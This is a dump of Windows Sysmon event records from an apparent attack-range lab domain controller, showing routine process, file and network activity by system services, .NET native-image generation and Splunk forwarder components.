21:01:57.055{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A145-60D3-CC02-00000000CF01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.056{4DB9351A-A145-60D3-CC02-00000000CF01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:58.773{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A146-60D3-CF02-00000000CF01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.758{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A146-60D3-CF02-00000000CF01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:58.758{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A146-60D3-CF02-00000000CF01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A146-60D3-CE02-00000000CF01}856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.648{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A146-60D3-CE02-00000000CF01}856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.648{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A146-60D3-CE02-00000000CF01}856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+8
4d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.539{4DB9351A-A144-60D3-CB02-00000000CF01}5936NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KNYONB6P42\System.Workflow.Activities.ni.dll.auxMD5=D1C9D6C281FD10D3EA0ABE7773CEE5CD,SHA256=6334460E47D65AB61BD30EA454E063DC95CDECBBA069A382214D554884C96FAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.539{4DB9351A-A144-60D3-CB02-00000000CF01}5936NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KNYONB6P42\System.Workflow.Activities.ni.dllMD5=A7203C7CA28EC5708948AAB0C8415F0D,SHA256=13C2E328D5DAD8783A82899C4B5F2F7C65D0CE2A60F95F976FD83F057109018B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.508{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD542D7CAC91EF6271FEADBDF58CBB3,SHA256=BE24E988D30C875F573D3EE6426AE401B12E77E86088CB5B3C3D73D246592922,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:58.445{4DB9351A-A144-60D3-CB02-00000000CF01}5936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1730-0\System.Workflow.Activities.dll2021-06-23 21:01:58.445 10341000x800000000000000019360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:58.273{4DB9351A-A146-60D3-CD02-00000000CF01}55484296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000019359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.201{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61378-false10.0.1.12-8000- 23542300x800000000000000019358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D543C6CF8B7898B9330CC508E40787EC,SHA256=C7E12CE33C4BA9B1E76791F62755DBCEB8C418C96602D125506E076528E40EAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A146-60D3-CD02-00000000CF01}5548C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:58.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:58.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A146-60D3-CD02-00000000CF01}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A146-60D3-CD02-00000000CF01}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
154100x800000000000000019350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.071{4DB9351A-A146-60D3-CD02-00000000CF01}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x800000000000000019380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.680{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A147-60D3-D002-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A147-60D3-D002-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
